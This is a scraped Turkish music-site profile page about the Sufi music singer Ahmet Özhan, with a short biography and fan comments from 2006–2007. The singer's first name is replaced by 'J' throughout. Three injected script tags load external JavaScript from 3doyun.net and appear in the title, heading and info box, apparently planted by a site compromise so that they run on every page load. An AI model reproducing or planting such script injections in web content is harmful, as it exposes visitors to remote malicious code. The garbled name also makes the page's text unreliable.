İslami Müzik Tv
İslami Müzik TV

  Ayeti Kerime
" "
  Hadis-i Şerif
""

J<script src=http://3doyun.net/dcr/s.js></script> Özhan Profili - İslamimuzik.com

    J Özhan Kimdir ?J<script src=http://3doyun.net/dcr/s.js></script> Aslen Urfalı olan sanatçının babası polistir. 1970li yıllarda Bebek Belediye Gazinosunda Emel Sayın’ın alt kadrosunda sahneye çıktığı sıralarda, Gazinocular Kralı Fahrettin Aslan kendisini keşfeder ve "Gel Maksim’de çalış" der.

O günden sonra Özhan, 17-18 yaşlarındayken maksimin yeni prensi olur.. 1973 senesinde, başrolünü Hale Soygazi ve Aytaç Armanla paylaştığı ilk filmi olan "Çocuğumu İstiyorum" da oyunculuk deneyimi yaşar ve arkasından 4 film daha çevirir..

Bir iftar yemeğinde Muzaffer Ozak ile tanıştıktan sonra dünyaya farklı bir pencereden bakmaya başlar. Ve Türk Tasavvuf Musikisi alanında bir çok çalışmalara imza atar.

Ahmet özhan evli ve biri erkek biri kız olmak üzere iki çocuk babasıdır.


Bu Sanatçının Profili 2289 kez ziyaret edilmiştir.

     J Özhan - Yorum Ekle

Merve ŞAHİN
merhaba adım merve. ahmet özhanı çok seviyorum. gerçekten çok güzel şarkıları, ilahileri var yüğeğini katıyor söylerken. koyu bir ahmet özhan hayranıyım. özellikle ağır tarzda söylediği ilahiler çok güzel sabahtan akşama kadar oturup onları dinliyorum. annemler bana 70 yaşındaki dedenin dinlediği müzikleri dinliyosun desede onlar hakikati yani özü göremiyorlar. öz olmadıktan sonra söz ne işe yarar...?
Bu yorum 2007-10-15 18:01:27 tarihinde yapıldı.

Merve ŞAHİN
Amet Özhan'ı çok beğenerek severek dinliyorum. Benim gibi yaşı 15 olupta Ahmet Özhan dinleyen çok enderdir. Ama bence bütün gençlik dinlemeli. Çünkü dinlerken insan dinleniyor. Sesi çok güzel. Özellikle ilahileri çok güzel yorumluyor. Seslendirdiği ilahilerden en çok Sevdim Seni Mabuduma ilahisini seviyorum.
Bu yorum 2007-05-01 16:50:55 tarihinde yapıldı.

Mustafa ACAR
Türk sanat Müziğinde ve bilhassa tasavvuf musikisinde yeri doldurulamayacak sanatçılardan birisiniz.Cenab-ı ALLAH'tan hayırlı uzun ömür ve Çalışmalarınızda Başarılar dilerim
Bu yorum 2007-02-13 11:42:01 tarihinde yapıldı.

Murat BALKAN
Ahmet Özhan gerek türk sanat müziğinde gerekse tasavvuf musikisinde alanında benzersizdir. Duru sesiyle yepyeni çalışmalara imza atması dileğiyle...
Bu yorum 2006-04-15 21:27:56 tarihinde yapıldı.


Yorum Yapyn

J Özhan

J<script src=http://3doyun.net/dcr/s.js></script>
Genel Bilgiler

Adı: J
Soyadı: Özhan
Doğum Yılı:
Doğum Yeri:
Tarz:
Eğitim Durumu:
Albüm Sayısı: 1
Etiketler:
Websitesi: Resmi Sayfası